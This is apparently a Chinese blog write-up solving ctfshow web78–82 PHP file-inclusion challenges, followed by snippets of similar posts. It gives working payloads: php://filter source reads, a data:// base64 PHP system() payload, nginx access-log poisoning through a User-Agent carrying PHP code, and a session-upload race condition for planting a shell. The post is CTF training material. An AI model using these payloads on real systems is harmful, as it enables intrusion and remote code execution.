shownews.php,ctfshow web入门 文件包含(持续更新)

最新推荐文章于 2023-01-11 01:38:05 发布
最新推荐文章于 2023-01-11 01:38:05 发布
阅读量221 收藏
点赞数
文章标签: shownews.php

文章目录

web78

web79

web80-81

web82

web78

if(isset($_GET['file'])){

$file = $_GET['file'];

include($file);

}else{

highlight_file(__FILE__);

}

第一题是最基础的文件包含,直接上payload

payload:

?file=php://filter/convert.base64-encode/resource=flag.php

得到base64加密的字符串,解密后即可得到flag

web79

if(isset($_GET['file'])){

$file = $_GET['file'];

$file = str_replace("php", "???", $file);

include($file);

}else{

highlight_file(__FILE__);

}

这题过滤了php,可以用data伪协议

payload:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

后面base64加密的内容是<?php system("cat flag.php");?>,这样即可成功绕过php被过滤。flag因为是php文件,所以在注释里

web80-81

if(isset($_GET['file'])){

$file = $_GET['file'];

$file = str_replace("php", "???", $file);

$file = str_replace("data", "???", $file);

include($file);

}else{

highlight_file(__FILE__);

}

这题因为把php和data都ban了,所以需要日志包含,这个Linux的日志文件路径是/var/log/nginx/access.log,要在用文件包含漏洞读取日志文件的同时,修改ua头为我们想要执行的命令(burp中go要点两次才能执行命令,且操作一定不能出问题,如果报错就要销毁容器从头再来)

56409f5bd9a37e1796fcd06f5dd60fb4.png

258f7118c4a86c01ac5cd4af8b787864.png

payload:

?file=/var/log/nginx/access.log

User-Agent: <?php system('ls'); ?>

User-Agent: <?php system('cat fl0g.php'); ?>

web82

if(isset($_GET['file'])){

$file = $_GET['file'];

$file = str_replace("php", "???", $file);

$file = str_replace("data", "???", $file);

$file = str_replace(":", "???", $file);

$file = str_replace(".", "???", $file);

include($file);

}else{

highlight_file(__FILE__);

}

这题又过滤了.,日志包含的方法就不能用了(access.log),去看大佬的wp,他们的做法把我看傻了(不愧是大佬),需要用到条件竞争。原理可以去看利用session对话进行文件包含利用原理,具体的过程可以去看NPFS大佬的利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含,他写的超级详细。

我说一说自己的理解吧:

简要的选取一些内容粘贴过来:

session还有一个默认选项,session.use_strict_mode默认值为0。此时用户是可以自己定义Session ID的。比如,我们在Cookie里设置PHPSESSID=TGAO,PHP将会在服务器上创建一个文件:/tmp/sess_TGAO”。即使此时用户没有初始化Session,PHP也会自动初始化Session。

问题来了,默认配置session.upload_progress.cleanup = on导致文件上传后,session文件内容立即清空

用户是可以自己定义Session ID的。比如,我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag”。即使此时用户没有初始化Session,PHP也会自动初始化Session,并产生一个键值.

对于第一点,正好它生成的临时文件里用的是_,可以将想要执行的命令<?php system('ls');?>写入这个文件;

但是,再看第二点,文件上传后,生成的临时文件会立即清空,也就是说以我们的速度是不可能读取的到,那么,就需要借助条件竞争漏洞了。

条件竞争:假设攻击者上传了一个用来生成恶意shell的文件,在上传完成和安全检查完成并删除它的间隙,攻击者通过不断地发起访问请求的方法访问了该文件,该文件就会被执行,并且在服务器上生成一个恶意shell的文件。至此,该文件的任务就已全部完成,至于后面发现它是一个不安全的文件并把它删除的问题都已经不重要了,因为攻击者已经成功的在服务器中植入了一个shell文件,后续的一切就都不是问题了。

文件上传前端代码:

首先,在上传完文件后抓第一个包,发送到爆破模块,这个包用来上传PHP_SESSION_UPLOAD_PROGRESS文件(省略ls步骤):

dec95d71f66576c098513f79d366568d.png

然后再抓题目容器的包,发到爆破模块,这个包用来请求临时文件:

cd4850ad8294b7572afab6392a5e221a.png

下面是条件竞争的一般步骤:

e869c9e7e53691ba02c96dfc625082a2.png

再将线程调为25,两个一起开始爆破。

emmmm,到这里容器过期了,强行用大佬的图片来收尾吧:

2e05975340675cca6ae4500742b99f9a.png

独识
关注
ASP基于WEB的房屋出租管理系统的设计与实现(源代码+LW).zip
02-28
`ad_manage`目录下的`ad_manage_count1.asp`和`ad_manage_count11.asp`等文件,可能包含了广告管理模块的多个子功能,如统计分析、分类管理等,帮助管理员监控广告效果和用户反馈。 `id_note.asp`可能是用户反馈或...
web入门-文件包含
wo41ge的博客
11-28 3336
web78~php伪协议 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 直接payload ?file=php://filter/read=convert.base64-encode/resource=flag.php web79~Data协议 <?php if(isset($_GET['file
CTFshow web入门——文件包含
小元砸的博客
02-07 4023
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
【ctfshow】文件包含练习2
qq_61109509的博客
02-11 2249
目录 web78 解法一 解法二 web79 解法一 解法二 web80 web81 web88 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 解法一 用include包含 /?file=php://filter/read=convert.base64-enc...
CTF.show 文件包含
m0_64444909的博客
08-25 1935
ctf文件包含
文件包含漏洞&伪协议
qq_62078839的博客
04-16 2395
文件包含 文件包含漏洞原理 PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入 include:包含并运行指定的文件,包含文件发生错误时,程序警告,但会继续执行。 include_once:检查这个文件是否已经被导入,如果已导入,便不会再导入。 require:包含并运行指定的文件,包含文件发生错误时,程序直接终止执行。 require_once:和 require 类似,不同处在于
新闻发布系统 php课程设计
06-17
【新闻发布系统】是一种基于Web的在线内容管理系统,用于发布、管理和组织各种类型的信息,如文章、公告、新闻更新等。在本案例中,这个系统是用PHP编程语言开发的,结合了MySQL数据库来存储和检索数据。PHP是一种...
CTFshow web 文件包含
m0_56993542的博客
10-18 417
web 78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 文件包含伪协议,没有过滤。 ?file=php://filter/read=convert.base64-encode/resource=flag.php 拿到flag的base64编码,直接去解码。 web 79 if(isset($_GET['file'])){
CTFSHOW文件包含
Yb_140的博客
04-06 4718
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接) 文件包含函数: 函数 区别 require() 在包含的过程中如果出现错误,会直接报错并退出程序的执行 include() 在包含的过程中如果出现错误,会抛出一个警告,程
ctfshow web入门 文件包含
Lum1n0us's Blog
02-03 1078
文章目录web78web79web80-81web82-86web87web88web116web117参考链接 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 第一题是最基础的文件包含,直接上payload payload: ?file=php://filter/convert.base64-enco
ctfshow文件包含-超详解
qq_50589021的博客
08-05 2110
文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain;base64,PD9waHAgc3lzd
<?php highlight_file(__FILE__); error_reporting(0); $file = $_GET["file"]; if (stristr($file, "file")){ die("你败了."); } //fl
weixin_35753431的博客
01-11 2208
这段代码是一个 PHP 程序,它实现了从用户输入中获取文件名并输出文件内容的功能。 首先,通过调用 highlight_file(FILE) 函数来输出代码,并通过 error_reporting(0) 函数来关闭错误报告。 然后,通过 $_GET["file"] 变量来获取文件名。 之后,判断文件中是否包含"file"字符串 ,如果包含的话,输出 "你败了." 最后,通过 file_get_c...
安恒暑期培训7-24wp
jojohacker的博客
09-27 419
BUU UPLOAD COURSE 1 发现了一段php代码 <?php highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } 蚁剑扫一下在根目录下发现flag或者?file=/flag出现flag [BSidesCF 2020]Had a bad day 构造category=php://filter/convert.base64-enc
CTFshow——文件包含
D.MIND 的博客
02-07 2262
web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 这里有个include文件包含。利用Filter机制,构造php://filter/convert.base64-encode/resource=×××的攻击数据读取文件,拿到各种文件的源码 payload: ?file=php://filter/conv
ctfshow-文件包含&文件上传(详解)
qq_50589021的博客
07-20 4354
文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain;base64,PD9waHAgc3lzd
CTFSHOW-文件包含
Monica的博客
09-12 6518
WEB78 题目: <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 知识点:php伪协议 php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 1、php://input
ctfshow文件包含
遇事不决冲冲冲
09-18 3381
web78 无防护读取源码 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 伪协议读取后base64解密 php://filter/read=convert.base64-encode/resource=flag.php web79 data协议 <?php if(isset($_GET['file
ctfshow_文件包含
qq_45951598的博客
03-27 363
文章目录WEB78web79 WEB78 没什么好讲的 payload:?file=php://filter/read=convert.base64-encode/resource=falg.php web79 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__F
反序列化漏洞
qq_41788704的博客
03-19 777
反序列化漏洞 反序列化漏洞我以前看过很多次了,可是一直都不能理解,今天有做了一个bugku的题目,就好像突然开窍一样,所以就想记下来。 下面就是源码 <!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_ge...
Text='<%# Eval("title") %>' NavigateUrl='<%# "shownews.aspx?id="+Eval("id") %>'
最新发布
07-28
引用\[1\]是页面的头部代码,指定了页面的语言和代码文件。引用\[2\]是在代码中设置新闻内容的显示方式,根据页码显示相应的内容。如果没有内容,则显示"无内容"。引用\[3\]是一个循环,用于生成新闻内容的分页链接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值